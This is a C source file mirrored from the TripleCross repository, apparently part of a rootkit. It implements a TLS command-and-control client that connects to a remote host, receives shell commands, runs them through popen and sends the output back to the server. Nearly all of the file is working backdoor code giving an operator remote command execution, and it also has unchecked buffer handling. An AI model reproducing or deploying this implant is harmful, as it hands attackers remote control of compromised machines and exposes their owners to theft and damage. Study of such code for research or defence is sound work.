mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-22 01:33:07 +08:00
185 lines
5.0 KiB
C
185 lines
5.0 KiB
C
// This is based from the following tutorial:
|
|
// https://aticleworld.com/ssl-server-client-using-openssl-in-c/
|
|
#include <errno.h>
|
|
#include <malloc.h>
|
|
#include <netdb.h>
|
|
#include <openssl/err.h>
|
|
#include <openssl/ssl.h>
|
|
#include <resolv.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <sys/socket.h>
|
|
#include <unistd.h>
|
|
|
|
#define LOCAL_ABORT() \
|
|
do { \
|
|
printf("Abort at %s:%d\n", __FILE__, __LINE__); \
|
|
abort(); \
|
|
} while (0)
|
|
|
|
/**
|
|
* @brief Executes a command in a pseudo terminal and returns stdout result
|
|
*
|
|
* @param command
|
|
* @return char*
|
|
*/
|
|
char *execute_command(char *command) {
|
|
FILE *fp;
|
|
char *res = calloc(4096, sizeof(char));
|
|
char buf[1024];
|
|
|
|
fp = popen(command, "r");
|
|
if (fp == NULL) {
|
|
perror("Failed to run command");
|
|
return NULL;
|
|
}
|
|
|
|
while (fgets(buf, sizeof(buf), fp) != NULL) {
|
|
strcat(res, buf);
|
|
}
|
|
// printf("RESULT OF COMMAND: %s\n", res);
|
|
|
|
pclose(fp);
|
|
return res;
|
|
}
|
|
|
|
int client_run(char *hostname, uint16_t portnum) {
|
|
SSL_CTX *ctx;
|
|
int server;
|
|
SSL *ssl;
|
|
static char buf[1024 * 1024];
|
|
int bytes;
|
|
|
|
struct hostent *host;
|
|
struct sockaddr_in addr;
|
|
const SSL_METHOD *method;
|
|
|
|
// Initialize the SSL library
|
|
SSL_library_init();
|
|
|
|
OpenSSL_add_all_algorithms(); /* Load cryptos, et.al. */
|
|
SSL_load_error_strings(); /* Bring in and register error messages */
|
|
method = TLSv1_2_client_method(); /* Create new client-method instance */
|
|
ctx = SSL_CTX_new(method); /* Create new context */
|
|
if (ctx == NULL) {
|
|
ERR_print_errors_fp(stderr);
|
|
LOCAL_ABORT();
|
|
}
|
|
|
|
if ((host = gethostbyname(hostname)) == NULL) {
|
|
perror(hostname);
|
|
LOCAL_ABORT();
|
|
}
|
|
server = socket(PF_INET, SOCK_STREAM, 0);
|
|
bzero(&addr, sizeof(addr));
|
|
addr.sin_family = AF_INET;
|
|
addr.sin_port = htons(portnum);
|
|
addr.sin_addr.s_addr = *(long *)(host->h_addr);
|
|
|
|
int conn_tries = 3;
|
|
while (conn_tries >= 0) {
|
|
if (connect(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
|
|
if (conn_tries > 1) {
|
|
conn_tries--;
|
|
printf("Failed to connect, trying again. Remaining tries: %i\n",
|
|
conn_tries);
|
|
sleep(1);
|
|
continue;
|
|
}
|
|
close(server);
|
|
perror(hostname);
|
|
fprintf(stderr, "Is the server running, and on the correct port (%d)?\n",
|
|
portnum);
|
|
LOCAL_ABORT();
|
|
} else {
|
|
// Connected
|
|
conn_tries = -1;
|
|
}
|
|
}
|
|
|
|
ssl = SSL_new(ctx); /* create new SSL connection state */
|
|
SSL_set_fd(ssl, server); /* attach the socket descriptor */
|
|
conn_tries = 3;
|
|
int connection_terminate = 0;
|
|
while (conn_tries > 0 && connection_terminate == 0) {
|
|
if (SSL_connect(ssl) <= 0) {
|
|
// Connection failed
|
|
conn_tries--;
|
|
printf("Failed to establish SSL connection, trying again. Remaining "
|
|
"tries: %i\n",
|
|
conn_tries);
|
|
ERR_print_errors_fp(stderr);
|
|
sleep(1);
|
|
} else {
|
|
// Connection success
|
|
X509 *cert;
|
|
char *line;
|
|
conn_tries = 0;
|
|
printf("\nConnected with %s encryption\n", SSL_get_cipher(ssl));
|
|
|
|
cert = SSL_get_peer_certificate(ssl); /* get the server's certificate */
|
|
if (cert != NULL) {
|
|
printf("Server certificates:\n");
|
|
line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
|
|
printf("Subject: %s\n", line);
|
|
free(line);
|
|
line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
|
|
printf("Issuer: %s\n\n", line);
|
|
free(line);
|
|
X509_free(cert);
|
|
} else {
|
|
printf("Info: No client certificates configured.\n");
|
|
}
|
|
|
|
while(connection_terminate == 0){
|
|
|
|
bytes = SSL_read(ssl, buf, sizeof(buf)); // Get request
|
|
buf[bytes] = '\0';
|
|
|
|
printf("Raw server msg:\n[%s]\n", buf);
|
|
|
|
// If valid message in protocol, we proceed to parse it
|
|
if (strncmp(buf, CC_PROT_BASH_COMMAND_REQUEST, strlen(CC_PROT_BASH_COMMAND_REQUEST)) == 0) {
|
|
if (bytes > 0) {
|
|
// printf("Reply with:\n[%s]\n", response);
|
|
char *p;
|
|
p = strtok(buf, "#");
|
|
p = strtok(NULL, "#");
|
|
if (p) {
|
|
char *res = execute_command(p);
|
|
char *response = calloc(4096, sizeof(char));
|
|
if(res==NULL){
|
|
strcpy(response, CC_PROT_ERR);
|
|
}else{
|
|
strcpy(response, CC_PROT_BASH_COMMAND_RESPONSE);
|
|
strcat(response, res);
|
|
}
|
|
printf("Answering: \n%s\n", response);
|
|
SSL_write(ssl, response, strlen(response));
|
|
free(response);
|
|
} else {
|
|
printf("Could not parse message correctly, ignoring\n");
|
|
}
|
|
} else {
|
|
ERR_print_errors_fp(stderr);
|
|
}
|
|
}else if (strncmp(buf, CC_PROT_FIN, strlen(CC_PROT_FIN)) == 0) {
|
|
printf("Server requested to stop the connection\n");
|
|
connection_terminate = 1;
|
|
}else {
|
|
//If at this point, then we failed to identify the server message
|
|
printf("Message not recognizable: %s\n", buf);
|
|
char *response = CC_PROT_ERR;
|
|
SSL_write(ssl, response, strlen(response));
|
|
}
|
|
}
|
|
|
|
}
|
|
}
|
|
printf("SSL client closed\n");
|
|
close(server); /* close socket */
|
|
SSL_CTX_free(ctx); /* release context */
|
|
|
|
return 0;
|
|
}
|